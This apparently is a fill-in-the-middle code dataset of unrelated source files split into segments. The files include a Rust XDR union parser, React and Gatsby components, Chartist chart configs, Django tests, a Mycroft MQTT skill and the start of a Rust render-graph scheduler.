ipaddr.py | from tfchain.polyfill.encoding.jsmods.ipaddrjs import api as ipaddrjs
import tfchain.polyfill.array as jsarr
class IPAddress:
def __init__(self, value):
if isinstance(value, str):
v = None
err = None
__pragma__("js", "{}", """
try {
v = ipaddrjs.parse(value);
} catch(e) {
err = e;
}
""")
if err != None:
raise ValueError("invalid str value {}: {}".format(value, err))
self._value = v
elif isinstance(value, (bytes, bytearray)) or jsarr.is_uint8_array(value):
v = None
err = None
__pragma__("js", "{}", """
try {
v = ipaddrjs.fromByteArray(value);
} catch(e) {
err = e;
}
""")
if err != None:
raise ValueError("invalid raw value {}: {}".format(value, err))
self._value = v
elif isinstance(value, IPAddress):
self._value = value.value
else:
raise TypeError("value {} of type {} is not supported as an IPAddress".format(value, type(value)))
@property
def value(self):
return self._value
def is_ipv4(self):
result = None
v = self._value
__pragma__("js", "{}", """
result = v.constructor === ipaddrjs.IPv4;
""")
return result
def is_ipv6(self):
result = None
v = self._value
__pragma__("js", "{}", """
result = v.constructor === ipaddrjs.IPv6;
""")
return result
def __str__(self):
return self._value.toString()
def str(self):
return self.__str__()
def | (self):
v = self._value
__pragma__("js", "{}", """
v = new Uint8Array(v.toByteArray());
""")
return v
| bytes |
withRoot.js | import React from 'react';
import { MuiThemeProvider, createMuiTheme } from '@material-ui/core/styles';
import CssBaseline from '@material-ui/core/CssBaseline';
// A theme with custom primary and secondary color.
// It's optional.
const theme = createMuiTheme({
typography: {
useNextVariants: true,
},
palette: {
primary: {
light: '#62727b',
main: '#37474f',
dark: '#102027',
contrastText: '#ffffff',
},
secondary: {
light: '#ff833a',
main: '#e65100',
dark: '#ac1900',
contrastText: '#eeeeee',
},
},
}); | // thanks to React context.
return (
<MuiThemeProvider theme={theme}>
{/* Reboot kickstart an elegant, consistent, and simple baseline to build upon. */}
<CssBaseline />
<Component {...props} />
</MuiThemeProvider>
);
}
return WithRoot;
}
export default withRoot; |
function withRoot(Component) {
function WithRoot(props) {
// MuiThemeProvider makes the theme available down the React tree |
union.rs | use super::*;
#[derive(Debug, Clone, PartialEq)]
pub struct UnionSwitch {
pub var_name: String,
pub var_type: BasicType,
}
#[derive(Debug, Clone, PartialEq)]
pub struct Union {
pub name: String,
pub cases: Vec<UnionCase>,
pub default: Option<UnionCase>,
pub void_cases: Vec<String>,
pub switch: UnionSwitch,
}
impl Union {
pub(crate) fn new(vs: Vec<Node<'_>>) -> Self {
let name = vs[0].ident_str().to_string();
let mut cases = Vec::new();
let mut void_cases = Vec::new();
let mut default = None;
let switch = UnionSwitch {
var_name: vs[2].ident_str().to_string(),
var_type: BasicType::from(vs[1].ident_str().to_string()),
};
// Collect the set of case values that "fallthrough" to the eventual
// UnionCase
let mut case_values = Vec::new();
for v in vs.into_iter().skip(3) {
let mut is_default_case = false;
let stmt = match v {
Node::UnionCase(nodes) => CaseStmt::parse(case_values, nodes),
Node::UnionDefault(nodes) => {
is_default_case = true;
case_values.push("default".to_string());
CaseStmt::parse(case_values, nodes)
}
v => panic!("unexpected token type for union {:?}", v),
};
match stmt {
CaseStmt::Defined(c) if is_default_case => default = Some(c),
CaseStmt::Defined(c) => cases.push(c),
CaseStmt::Fallthrough(values) => {
// The parsed fallthrough ident has been pushed to the
// returned case_values
case_values = values;
continue;
}
CaseStmt::Void(values) => void_cases.extend_from_slice(&values),
}
case_values = Vec::new()
}
Union {
name,
cases,
default,
void_cases,
switch,
}
}
pub fn name(&self) -> &str {
&self.name
}
}
impl CompoundType for Union {
fn inner_types(&self) -> Vec<&ArrayType<BasicType>> {
self.cases
.iter()
.chain(self.default.iter())
.map(|f| &f.field_value)
.collect()
}
fn contains_opaque(&self) -> bool {
self.cases
.iter()
.chain(self.default.iter())
.any(|f| f.contains_opaque())
}
}
#[derive(Debug, Clone, PartialEq)]
pub struct | {
/// The case values that map to this field name and type.
///
/// This can be more than one value when the union contains fallthrough
/// statements.
pub case_values: Vec<String>,
pub field_name: String,
pub field_value: ArrayType<BasicType>,
}
impl UnionCase {
pub(crate) fn new(case_values: Vec<String>, field: Vec<Node<'_>>) -> Self {
match field.as_slice() {
[Node::Type(t), Node::Type(BasicType::Ident(l))] => Self {
case_values,
field_name: l.to_string(),
field_value: ArrayType::None(t.to_owned()),
},
_ => panic!("invalid number of union field tokens"),
}
}
pub fn contains_opaque(&self) -> bool {
matches!(self.field_value.unwrap_array(), BasicType::Opaque)
}
}
enum CaseStmt {
/// A case statement with no fields defined, falling through to the next
/// case statement.
Fallthrough(Vec<String>),
/// A fully-defined case statement, with a case value and fields.
Defined(UnionCase),
Void(Vec<String>),
}
impl CaseStmt {
fn parse(mut case_values: Vec<String>, mut nodes: Vec<Node<'_>>) -> Self {
match nodes.remove(0) {
Node::Type(t) => case_values.push(t.as_str().to_string()),
Node::UnionVoid => {
// No ident, this is a default case
return Self::Void(case_values);
}
Node::UnionDataField(nodes) => {
// No ident, this is a default case
return Self::Defined(UnionCase::new(case_values, nodes));
}
_ => unreachable!(),
};
if nodes.is_empty() {
return Self::Fallthrough(case_values);
}
match nodes.remove(0) {
Node::UnionDataField(nodes) => Self::Defined(UnionCase::new(case_values, nodes)),
Node::UnionVoid => Self::Void(case_values),
_ => unreachable!(),
}
}
}
#[cfg(test)]
mod tests {
use super::*;
macro_rules! parse {
($input: expr) => {{
let ast = XDRParser::parse(Rule::item, $input)
.unwrap()
.next()
.unwrap();
let root = walk(ast);
let union = root.into_inner().remove(0);
match union {
Node::Union(u) => u,
_ => panic!("not a union in ast root"),
}
}};
}
#[test]
fn test_union() {
let got = parse!(
r#"
union createhow4 switch (createmode4 mode) {
case GUARDED4:
fattr4 createattrs;
case EXCLUSIVE4:
verifier4 createverf;
};"#
);
assert_eq!(got.name, "createhow4");
assert_eq!(got.default, None);
assert_eq!(got.void_cases.len(), 0);
assert_eq!(got.cases.len(), 2);
assert_eq!(&got.cases[0].case_values, &["GUARDED4"]);
assert_eq!(got.cases[0].field_name, "createattrs");
assert_eq!(
got.cases[0].field_value,
ArrayType::None(BasicType::Ident("fattr4".to_string()))
);
assert_eq!(&got.cases[1].case_values, &["EXCLUSIVE4"]);
assert_eq!(got.cases[1].field_name, "createverf");
assert_eq!(
got.cases[1].field_value,
ArrayType::None(BasicType::Ident("verifier4".to_string()))
);
assert_eq!(got.switch.var_name, "mode");
assert_eq!(
got.switch.var_type,
BasicType::Ident("createmode4".to_string())
);
}
#[test]
fn test_union_fallthrough() {
let got = parse!(
r#"
union createhow4 switch (createmode4 mode) {
case UNCHECKED4:
case GUARDED4:
fattr4 createattrs;
case EXCLUSIVE4:
verifier4 createverf;
};"#
);
assert_eq!(got.name, "createhow4");
assert_eq!(got.default, None);
assert_eq!(got.void_cases.len(), 0);
assert_eq!(got.cases.len(), 2);
assert_eq!(&got.cases[0].case_values, &["UNCHECKED4", "GUARDED4"]);
assert_eq!(got.cases[0].field_name, "createattrs");
assert_eq!(
got.cases[0].field_value,
ArrayType::None(BasicType::Ident("fattr4".to_string()))
);
assert_eq!(&got.cases[1].case_values, &["EXCLUSIVE4"]);
assert_eq!(got.cases[1].field_name, "createverf");
assert_eq!(
got.cases[1].field_value,
ArrayType::None(BasicType::Ident("verifier4".to_string()))
);
assert_eq!(got.switch.var_name, "mode");
assert_eq!(
got.switch.var_type,
BasicType::Ident("createmode4".to_string())
);
}
#[test]
fn test_union_void_default() {
let got = parse!(
r#"
union LOCKU4res switch (nfsstat4 status) {
case NFS4_OK:
stateid4 lock_stateid;
default:
void;
};"#
);
assert_eq!(got.name, "LOCKU4res");
assert_eq!(got.default, None);
assert_eq!(got.cases.len(), 1);
assert_eq!(&got.cases[0].case_values, &["NFS4_OK"]);
assert_eq!(got.cases[0].field_name, "lock_stateid");
assert_eq!(
got.cases[0].field_value,
ArrayType::None(BasicType::Ident("stateid4".to_string()))
);
assert_eq!(got.void_cases.len(), 1);
assert_eq!(&got.void_cases, &["default"]);
assert_eq!(got.switch.var_name, "status");
assert_eq!(
got.switch.var_type,
BasicType::Ident("nfsstat4".to_string())
);
}
#[test]
fn test_union_default() {
let got = parse!(
r#"
union LOCKU4res switch (nfsstat4 status) {
case NFS4_OK:
stateid4 lock_stateid;
default:
type_name field_name;
};"#
);
assert_eq!(got.name, "LOCKU4res");
assert_eq!(got.cases.len(), 1);
assert_eq!(&got.cases[0].case_values, &["NFS4_OK"]);
assert_eq!(got.cases[0].field_name, "lock_stateid");
assert_eq!(
got.cases[0].field_value,
ArrayType::None(BasicType::Ident("stateid4".to_string()))
);
assert_eq!(got.void_cases.len(), 0);
let default = &got.default.unwrap();
assert_eq!(default.case_values, &["default"]);
assert_eq!(default.field_name, "field_name");
assert_eq!(
default.field_value,
ArrayType::None(BasicType::Ident("type_name".to_string()))
);
assert_eq!(got.switch.var_name, "status");
assert_eq!(
got.switch.var_type,
BasicType::Ident("nfsstat4".to_string())
);
}
#[test]
fn test_union_case_void() {
let got = parse!(
r#"
union LOCKU4res switch (nfsstat4 status) {
case NFS4_OK:
stateid4 lock_stateid;
case something:
void;
default:
type_name field_name;
};"#
);
assert_eq!(got.name, "LOCKU4res");
assert_eq!(got.cases.len(), 1);
assert_eq!(&got.cases[0].case_values, &["NFS4_OK"]);
assert_eq!(got.cases[0].field_name, "lock_stateid");
assert_eq!(
got.cases[0].field_value,
ArrayType::None(BasicType::Ident("stateid4".to_string()))
);
assert_eq!(got.void_cases, &["something"]);
let default = &got.default.unwrap();
assert_eq!(default.case_values, &["default"]);
assert_eq!(default.field_name, "field_name");
assert_eq!(
default.field_value,
ArrayType::None(BasicType::Ident("type_name".to_string()))
);
assert_eq!(got.switch.var_name, "status");
assert_eq!(
got.switch.var_type,
BasicType::Ident("nfsstat4".to_string())
);
}
#[test]
fn test_union_case_void_fallthrough() {
let got = parse!(
r#"
union LOCKU4res switch (nfsstat4 status) {
case NFS4_OK:
stateid4 lock_stateid;
case another:
case something:
void;
default:
type_name field_name;
};"#
);
assert_eq!(got.name, "LOCKU4res");
assert_eq!(got.cases.len(), 1);
assert_eq!(&got.cases[0].case_values, &["NFS4_OK"]);
assert_eq!(got.cases[0].field_name, "lock_stateid");
assert_eq!(
got.cases[0].field_value,
ArrayType::None(BasicType::Ident("stateid4".to_string()))
);
assert_eq!(got.void_cases, &["another", "something",]);
let default = &got.default.unwrap();
assert_eq!(default.case_values, &["default"]);
assert_eq!(default.field_name, "field_name");
assert_eq!(
default.field_value,
ArrayType::None(BasicType::Ident("type_name".to_string()))
);
assert_eq!(got.switch.var_name, "status");
assert_eq!(
got.switch.var_type,
BasicType::Ident("nfsstat4".to_string())
);
}
}
| UnionCase |
charts.js | // ##############################
// // // javascript library for creating charts
// #############################
const Chartist = require("chartist");
// ##############################
// // // variables used to create animation on charts
// #############################
var delays = 80,
durations = 500;
var delays2 = 80,
durations2 = 500; | // #############################
const dailySalesChart = {
data: {
//labels: ["M", "T", "W", "T", "F", "S", "S"],
//series: [[12, 17, 7, 17, 23, 18, 38]]
},
options: {
lineSmooth: Chartist.Interpolation.cardinal({
tension: 0
}),
low: 0,
high: 50, // creative tim: we recommend you to set the high sa the biggest value + something for a better look
chartPadding: {
top: 0,
right: 0,
bottom: 0,
left: 0
},
showArea: true,
width: '400px',
height: '400px',
axisY: {
low: 0,
onlyInteger: true
}
},
// for animation
animation: {
draw: function(data) {
if(data.type === 'grid' && data.index === 0) {
data.element.attr({"style": "stroke:black;stroke-width:2"});
}
if (data.type === "line" || data.type === "area") {
data.element.animate({
d: {
begin: 600,
dur: 700,
from: data.path
.clone()
.scale(2, 0)
.translate(0, data.chartRect.height())
.stringify(),
to: data.path.clone().stringify(),
easing: Chartist.Svg.Easing.easeOutQuint
}
});
} else if (data.type === "point") {
data.element.animate({
opacity: {
begin: (data.index + 1) * delays,
dur: durations,
from: 0,
to: 1,
easing: "ease"
}
});
}
}
}
};
// ##############################
// // // Email Subscriptions
// #############################
const emailsSubscriptionChart = {
data: {
labels: [
"Jan",
"Feb",
"Mar",
"Apr",
"Mai",
"Jun",
"Jul",
"Aug",
"Sep",
"Oct",
"Nov",
"Dec"
],
series: [[542, 443, 320, 780, 553, 453, 326, 434, 568, 610, 756, 895]]
},
options: {
axisX: {
showGrid: false
},
low: 0,
high: 1000,
chartPadding: {
top: 0,
right: 5,
bottom: 0,
left: 0
}
},
responsiveOptions: [
[
"screen and (max-width: 640px)",
{
seriesBarDistance: 5,
axisX: {
labelInterpolationFnc: value => value[0]
}
}
]
],
animation: {
draw: data => {
if(data.type === 'grid' && data.index === 0) {
data.element.attr({"style": "stroke:black;stroke-width:2"});
}
if (data.type === "bar") {
data.element.animate({
opacity: {
begin: (data.index + 1) * delays2,
dur: durations2,
from: 0,
to: 1,
easing: "ease"
}
});
}
}
}
};
// ##############################
// // // Completed Tasks
// #############################
const completedTasksChart = {
data: {
labels: ["12am", "3pm", "6pm", "9pm", "12pm", "3am", "6am", "9am"],
series: [[230, 750, 450, 300, 280, 240, 200, 190]]
},
options: {
lineSmooth: Chartist.Interpolation.cardinal({
tension: 0
}),
low: 0,
high: 1000, // creative tim: we recommend you to set the high sa the biggest value + something for a better look
chartPadding: {
top: 0,
right: 0,
bottom: 0,
left: 0
}
},
animation: {
draw: data => {
if(data.type === 'grid' && data.index === 0) {
data.element.attr({"style": "stroke:black;stroke-width:2"});
}
if (data.type === "line" || data.type === "area") {
data.element.animate({
d: {
begin: 600,
dur: 700,
from: data.path
.clone()
.scale(1, 0)
.translate(0, data.chartRect.height())
.stringify(),
to: data.path.clone().stringify(),
easing: Chartist.Svg.Easing.easeOutQuint
}
});
} else if (data.type === "point") {
data.element.animate({
opacity: {
begin: (data.index + 1) * delays,
dur: durations,
from: 0,
to: 1,
easing: "ease"
}
});
}
}
}
};
module.exports = {
dailySalesChart,
emailsSubscriptionChart,
completedTasksChart
}; |
// ##############################
// // // Daily Sales |
tests.py | from django.test import TestCase
from models import Photo, Album
from imagr_users.models import ImagrUser
from imagr_images.models import get_file_owner_username
from admin import PhotoAdmin, AlbumAdmin, ImageSizeListFilter
from django.core.urlresolvers import reverse
from django.contrib.admin.sites import AdminSite
import datetime
from django.test.utils import setup_test_environment
setup_test_environment()
from django.test.client import Client
client = Client()
class ImagrTests(TestCase):
|
u1.follow(u2)
u1.follow(u3)
Photo.objects.create(
image='test.png',
title='u1 test image',
owner=u1,
published=1)
Photo.objects.create(
image='test.png',
title='u2 test image',
owner=u2,
published=1)
Photo.objects.create(
image='test.png',
title='u3 test image',
owner=u3,
published=1)
Album.objects.create(
title='test album',
owner=u1,
published=1,
)
self.site = AdminSite()
def test_get_file_owner(self):
test_photo = Photo.objects.get(title='u1 test image')
self.assertEqual(isinstance(test_photo, Photo), True)
test_filename = '/garbage/garbage/garbage/test.png'
result = get_file_owner_username(test_photo, test_filename)
today = datetime.datetime.utcnow()
expected = 'testuser/{}/{}/{}'.format(unicode(today.year), unicode(today.month), u'test.png')
self.assertEquals(result, expected)
def test_photo_save(self):
test_photo = Photo.objects.get(title='u1 test image')
self.assertGreater(test_photo.image_size, 0)
def test_album_owner_link(self):
test_album = Album.objects.get(title='test album')
expected = "<a href='../../imagr_users/imagruser/{}/'>{}</a>".format(
test_album.owner.id,
test_album.owner)
test_album_admin = AlbumAdmin(test_album, self.site)
self.assertEquals(test_album_admin.owner_link(test_album), expected)
def test_photo_owner_link(self):
test_photo = Photo.objects.get(title='u1 test image')
expected = "<a href='../../imagr_users/imagruser/{}/'>{}</a>".format(
test_photo.owner.id,
test_photo.owner)
test_photo_admin = AlbumAdmin(test_photo, self.site)
self.assertEquals(test_photo_admin.owner_link(test_photo), expected)
def test_view_stream_page(self):
#client.logout()
user = ImagrUser.objects.get(username='testuser')
client.logout()
#client.login()
# self.assertEqual(client.session['_auth_user_id'], user.pk)
response = client.get(reverse('stream_page'))
self.assertEquals(response.status_code, 200)
actual_photos = response.context['photos']
self.assertEquals(len(actual_photos), 3)
self.assertEquals(actual_photos[0].title, 'u3 test image')
self.assertEquals(actual_photos[1].title, 'u2 test image')
self.assertEquals(actual_photos[2].title, 'u1 test image') | def setUp(self):
u1 = ImagrUser.objects.create(username='testuser')
u2 = ImagrUser.objects.create(username='testuser2')
u3 = ImagrUser.objects.create(username='testuser3') |
parse_expression.rs | #![allow(clippy::trivial_regex)]
use once_cell::sync::Lazy;
use regex::Regex;
use std::borrow::Cow;
use super::helpers::{parsing_catch_all, Token, TokenExtensions};
use super::Rule;
use crate::ast::*;
pub fn parse_expression(token: &Token) -> Expression {
let first_child = token.first_relevant_child();
let span = Span::from_pest(first_child.as_span());
match first_child.as_rule() {
Rule::numeric_literal => Expression::NumericValue(first_child.as_str().to_string(), span),
Rule::string_literal => Expression::StringValue(parse_string_literal(&first_child), span),
Rule::boolean_literal => Expression::BooleanValue(first_child.as_str().to_string(), span),
Rule::constant_literal => Expression::ConstantValue(first_child.as_str().to_string(), span),
Rule::function => parse_function(&first_child),
Rule::array_expression => parse_array(&first_child),
_ => unreachable!(
"Encountered impossible literal during parsing: {:?}",
first_child.tokens()
),
} | let mut arguments: Vec<Expression> = vec![];
for current in token.relevant_children() {
match current.as_rule() {
Rule::non_empty_identifier => name = Some(current.as_str().to_string()),
Rule::expression => arguments.push(parse_expression(¤t)),
_ => parsing_catch_all(¤t, "function"),
}
}
match name {
Some(name) => Expression::Function(name, arguments, Span::from_pest(token.as_span())),
_ => unreachable!("Encountered impossible function during parsing: {:?}", token.as_str()),
}
}
fn parse_array(token: &Token) -> Expression {
let mut elements: Vec<Expression> = vec![];
for current in token.relevant_children() {
match current.as_rule() {
Rule::expression => elements.push(parse_expression(¤t)),
_ => parsing_catch_all(¤t, "array"),
}
}
Expression::Array(elements, Span::from_pest(token.as_span()))
}
pub fn parse_arg_value(token: &Token) -> Expression {
let current = token.first_relevant_child();
match current.as_rule() {
Rule::expression => parse_expression(¤t),
_ => unreachable!("Encountered impossible value during parsing: {:?}", current.tokens()),
}
}
fn parse_string_literal(token: &Token) -> String {
let current = token.first_relevant_child();
match current.as_rule() {
Rule::string_content => unescape_string_literal(current.as_str()).into_owned(),
_ => unreachable!(
"Encountered impossible string content during parsing: {:?}",
current.tokens()
),
}
}
#[allow(clippy::trivial_regex)]
fn unescape_string_literal(original: &str) -> Cow<'_, str> {
static STRING_LITERAL_UNESCAPE_RE: Lazy<Regex> = Lazy::new(|| Regex::new(r#"\\(")"#).unwrap());
static STRING_LITERAL_BACKSLASHES_RE: Lazy<Regex> = Lazy::new(|| Regex::new(r#"\\\\"#).unwrap());
static STRING_LITERAL_NEWLINE_RE: Lazy<Regex> = Lazy::new(|| Regex::new(r#"\\n"#).unwrap());
match STRING_LITERAL_UNESCAPE_RE.replace_all(original, "\"") {
Cow::Owned(s) => match STRING_LITERAL_NEWLINE_RE.replace_all(&s, "\n") {
Cow::Owned(s) => STRING_LITERAL_BACKSLASHES_RE.replace_all(&s, "\\").into_owned().into(),
Cow::Borrowed(s) => STRING_LITERAL_BACKSLASHES_RE.replace_all(s, "\\").into_owned().into(),
},
Cow::Borrowed(s) => match STRING_LITERAL_NEWLINE_RE.replace_all(s, "\n") {
Cow::Owned(s) => STRING_LITERAL_BACKSLASHES_RE.replace_all(&s, "\\").into_owned().into(),
Cow::Borrowed(s) => STRING_LITERAL_BACKSLASHES_RE.replace_all(s, "\\").into_owned().into(),
},
}
} | }
fn parse_function(token: &Token) -> Expression {
let mut name: Option<String> = None; |
mod.rs | pub mod population;
pub mod generation;
pub mod niche;
pub mod genocide;
pub mod survival;
/// Genome is what will actually be evolved through the engine,
/// this is going to be whatever data structure should be optimized
pub mod genome {
use super::environment::Envionment;
use std::marker::Sized;
use std::sync::{Arc, RwLock};
pub trait Genome<T, E>
where
T: ?Sized + Send + Sync,
E: ?Sized + Send + Sync
{
/// Crossover is the process of taking two types (T) and returning
/// a new type, this is done through some defined form of
/// mutation using the config type, or through crossover
/// where parts of one type are given to parts of the other and that resulting
/// type is returned
fn crossover(one: &T, two: &T, env: Arc<RwLock<E>>, crossover_rate: f32) -> Option<T>
where
T: Sized,
E: Envionment + Sized;
/// This is a measure of an evolutionary type's structure or topology - depending on what is being evolved.
/// This is needed to split the members in their respective species - essentially it is
/// a measure of how far away two types are from each other in a genetic
/// sense. Think of something like how similar humans are to dolphins, this is a way to quantify that.
fn distance(one: &T, two: &T, env: Arc<RwLock<E>>) -> f32;
/// Genome needs to have a base implementation in order for one of the population options to be satisfied
///
/// This can probably be implemented in a generic way for default if the user doesn't want to
/// implement it for their problem.
fn base(_: &mut E) -> T
where T: Sized
{
panic!("Base not implemented.");
}
}
}
/// Environment represents overall settings for a genome, this can be statistics to be
/// tracked through evolution, or things like mutation rates or global counters. This is
/// injected into functions throughout the generational process so it is accessible globally as a
/// center point for the evolution. Note - if this is to be used a mutable in crossover or mutation,
/// this will slow down the optimization process as it will have to be locked during the writing thus
/// having the variables in the implementation of this trait be readonly is preferred but isn't that big of a deal
pub mod environment {
pub trait Envionment {
/// Reset can be used to reset the environment after a certain event occurs,
/// if not this is an empty default implementation
fn | (&mut self) { }
}
}
/// Problem is the actual problem to be solved.
/// This is wrapped in an Arc pointer due to the problem not wanting to be
/// copied through threads. This was done intentionally because I wanted to be able to
/// represent supervised, unsupervised, and general reinforcement learning problems. This
/// means if you are using a supervised system and have a large dataset to analyze, if this
/// dataset is stored in the problem (as they should be), without an Arc pointer this large dataset would
/// be copied multiple times and take up massive amounts of memory. The Arc allows us to keep only one version
/// of the problem and share that between threads. Note - this means everything in the problem and all it's data
/// is explicitly readonly
pub mod problem {
pub trait Problem<T> {
/// empty can be a new for Self, or some sort of default value,
/// just needed to create a population with base parameters
fn empty() -> Self;
/// Solve is what actually solves the problem , given a solver (the genome type)
/// use the data in the type implementing the problem to solve the problem and return
/// the member's score. The result of this function is the member's fitness score
fn solve(&self, member: &mut T) -> f32;
}
} | reset |
__init__.py |
from mycroft import MycroftSkill
from mycroft.messagebus import Message
import json
from .lib import MqttService
class MessageListener(MycroftSkill):
# Initializing the skill
def initialize(self):
self.log.info("Initializing Skill MessageListener")
self.add_event('speak', self.handler_speak)
self.add_event('enclosure.mouth.viseme_list', self.handler_enclosure_mouth_viseme_list)
self.mqttservice = MqttService("VisemeSkill", "mosquitto", self.log.info)
self.prepare_for_webapp_message()
def prepare_for_webapp_message(self):
self.mqttservice.loopStart()
self.mqttservice.subscribe("faceme/webapp", self.message_recieved)
# acquiring speak data (the text mycroft will output):
def | (self, message):
self.text = message.data.get('utterance')
# acquiring mouth_viseme_list data:
def handler_enclosure_mouth_viseme_list(self, message):
self.startTime = message.data.get('start')
self.visemes = message.data.get('visemes')
# Call method send_visemelist(build_json()) to send our now complete dataset via mqtt in a json string format
self.send_visemelist(self.build_json())
# Function to convert the strings acquired from the messagebus into a json string and return it:
def build_json(self):
data_set = {"text": self.text, "start": self.startTime, "visemes": self.visemes}
json_dump = json.dumps(data_set)
return json_dump
def send_visemelist(self, payload):
self.mqttservice.subscribe("faceme/mycroft/visemes", self.message_recieved) # Printet on_message von MQTT_service
# Publish the payload we created in build_json() Wird richtig übertragen
self.mqttservice.publish("faceme/mycroft/visemes", payload)
def message_recieved(self, message):
self.log.info("Es ist eine Nachricht angekommen: " + str(message.payload) + " topic: " + message.topic)
if message.topic == "faceme/webapp":
self.webapp_message(message)
def webapp_message(self, message):
decoded_message = str(message.payload.decode("utf-8"))
msg = json.loads(decoded_message)
self.bus.emit(Message(msg["type"], msg["data"]))
def shutdown(self):
self.mqttservice.loopStop()
self.mqttservice.disconnect()
def create_skill():
return MessageListener()
###### Unused Function #######
# Function adds the duration each viseme should be displayed to it's array so the data would be: "visemes": [[CODE, END_TIME, DURATION], ...]
#def addDuration(self):
#self.visemes[0].append(self.visemes[0][1]) # Do we need this?
#for x in range(len(self.visemes)):
#if x < (len(self.visemes)-1):
#duration = self.visemes[x+1][1] - self.visemes[x][1]
#self.visemes[x+1].append(duration) | handler_speak |
Get.js |
const db = require("../../../database/connection");
async function | () {
const conn = await db.connect();
const [rows] = await conn.query(`SELECT * FROM tbl_empresas INNER JOIN tbl_contato_empresa ON tbl_empresas.cnpj = tbl_contato_empresa.cnpj ORDER BY empresa ASC`);
return rows;
}
module.exports = { getCompanies } | getCompanies |
Image.tsx | import * as React from 'react'
import { StaticQuery, graphql } from 'gatsby'
import Img, { FluidObject } from 'gatsby-image'
import styled from '@emotion/styled'
interface ImageProps {
filename: string
alt?: string
className?: string
}
const StyledImg = styled(Img)`
&.diImage {
margin-top: 200px;
}
width: 100%;
`
export const Image: React.FC<ImageProps> = props => (
<StaticQuery
query={graphql`
query {
images: allFile(filter: { relativeDirectory: { glob: "images" } }) {
edges {
node {
relativePath
name
childImageSharp {
sizes(maxWidth: 600) {
...GatsbyImageSharpSizes
}
}
}
}
}
}
`}
render={data => {
// eslint-disable-next-line @typescript-eslint/no-explicit-any
const image = data.images.edges.find((n: Record<string, any>) => {
return n.node.relativePath.includes(props.filename)
})
if (!image) {
return <div>No image found :(</div>
}
const imageSizes: FluidObject = image.node.childImageSharp.sizes
return <StyledImg alt={props.alt} fluid={imageSizes} className={props.className} /> | />
) | }} |
collect.rs | use std::cmp::max;
use std::hash::Hash;
use std::ops::Range;
use fnv::FnvHashMap;
use chain::{BufferChains, Chain, ImageChains, Link, LinkNode};
use node::{Node, State};
use resource::{Buffer, Image, Resource};
use schedule::{FamilyId, Queue, QueueId, Schedule, Submission, SubmissionId};
use Id;
/// Placeholder for synchronization type.
#[derive(Clone, Copy, Debug)]
pub struct Unsynchronized;
/// Result of node scheduler.
#[derive(Debug)]
pub struct Chains<S = Unsynchronized> {
/// Contains submissions for nodes spread among queue schedule.
pub schedule: Schedule<S>,
/// Contains all buffer chains.
pub buffers: BufferChains,
/// Contains all image chains.
pub images: ImageChains,
}
#[derive(PartialEq, PartialOrd, Eq, Ord)]
struct Fitness {
transfers: usize,
wait_factor: usize,
}
struct ResolvedNode {
id: usize,
family: FamilyId,
queues: Range<usize>,
rev_deps: Vec<usize>,
buffers: Vec<(usize, State<Buffer>)>,
images: Vec<(usize, State<Image>)>,
}
impl Default for ResolvedNode {
fn default() -> Self {
ResolvedNode {
id: 0,
family: FamilyId(0),
queues: 0..0,
rev_deps: Vec::new(),
buffers: Vec::new(),
images: Vec::new(),
}
}
}
struct ResolvedNodeSet {
nodes: Vec<ResolvedNode>,
queues: Vec<QueueId>,
buffers: Vec<Id>,
images: Vec<Id>,
}
struct ChainData<R: Resource> {
chain: Chain<R>,
last_link_wait_factor: usize,
current_link_wait_factor: usize,
current_family: Option<FamilyId>,
}
impl<R: Resource> Default for ChainData<R> {
fn default() -> Self {
ChainData {
chain: Chain::new(),
last_link_wait_factor: 0,
current_link_wait_factor: 0,
current_family: None,
}
}
}
struct QueueData {
queue: Queue<Unsynchronized>,
wait_factor: usize,
}
/// Calculate automatic `Chains` for nodes.
/// This function tries to find most appropriate schedule for nodes execution.
pub fn collect<Q>(nodes: Vec<Node>, max_queues: Q) -> Chains
where
Q: Fn(FamilyId) -> usize,
{
// Resolve nodes into a form faster to work with.
let (nodes, mut unscheduled_nodes) = resolve_nodes(nodes, max_queues);
let mut ready_nodes = Vec::new();
// Chains.
let mut images: Vec<ChainData<Image>> = fill(nodes.images.len());
let mut buffers: Vec<ChainData<Buffer>> = fill(nodes.buffers.len());
// Schedule
let mut schedule = Vec::with_capacity(nodes.queues.len());
for i in 0..nodes.queues.len() {
schedule.push(QueueData {
queue: Queue::new(nodes.queues[i]),
wait_factor: 0,
});
}
for node in &nodes.nodes {
if unscheduled_nodes[node.id] == 0 {
ready_nodes.push(node);
}
}
let mut scheduled = 0;
if nodes.queues.len() == 1 {
// With a single queue, wait_factor is always the number of scheduled nodes, and
// transfers is always zero. Thus, we only need dependency resolution.
while let Some(node) = ready_nodes.pop() {
schedule_node(
&mut ready_nodes,
&mut unscheduled_nodes,
&nodes,
node,
0,
scheduled,
scheduled,
&mut schedule,
&mut images,
&mut buffers,
);
scheduled += 1;
}
} else {
while !ready_nodes.is_empty() {
// Among ready nodes find best fit.
let (fitness, qid, index) = ready_nodes
.iter()
.enumerate()
.map(|(index, &node)| {
let (fitness, qid) = fitness(node, &mut images, &mut buffers, &mut schedule);
(fitness, qid, index)
}).min()
.unwrap();
let node = ready_nodes.swap_remove(index);
schedule_node(
&mut ready_nodes,
&mut unscheduled_nodes,
&nodes,
node,
qid,
fitness.wait_factor,
scheduled,
&mut schedule,
&mut images,
&mut buffers,
);
scheduled += 1;
}
}
assert_eq!(scheduled, nodes.nodes.len(), "Dependency loop found!");
Chains {
schedule: reify_schedule(schedule),
buffers: reify_chain(&nodes.buffers, buffers),
images: reify_chain(&nodes.images, images),
}
}
fn fill<T: Default>(num: usize) -> Vec<T> {
let mut vec = Vec::with_capacity(num);
for _ in 0..num {
vec.push(T::default());
}
vec
}
struct LookupBuilder<I: Hash + Eq + Copy> {
forward: FnvHashMap<I, usize>,
backward: Vec<I>,
}
impl<I: Hash + Eq + Copy> LookupBuilder<I> {
fn new() -> LookupBuilder<I> {
LookupBuilder {
forward: FnvHashMap::default(),
backward: Vec::new(),
}
}
fn forward(&mut self, id: I) -> usize {
if let Some(&id_num) = self.forward.get(&id) {
id_num
} else {
let id_num = self.backward.len();
self.backward.push(id);
self.forward.insert(id, id_num);
id_num
}
}
}
fn resolve_nodes<Q>(nodes: Vec<Node>, max_queues: Q) -> (ResolvedNodeSet, Vec<usize>)
where
Q: Fn(FamilyId) -> usize,
{
let node_count = nodes.len();
let mut unscheduled_nodes = fill(nodes.len());
let mut reified_nodes: Vec<ResolvedNode> = fill(nodes.len());
let mut node_ids = LookupBuilder::new();
let mut queues = LookupBuilder::new();
let mut buffers = LookupBuilder::new();
let mut images = LookupBuilder::new();
let mut family_full = FnvHashMap::default();
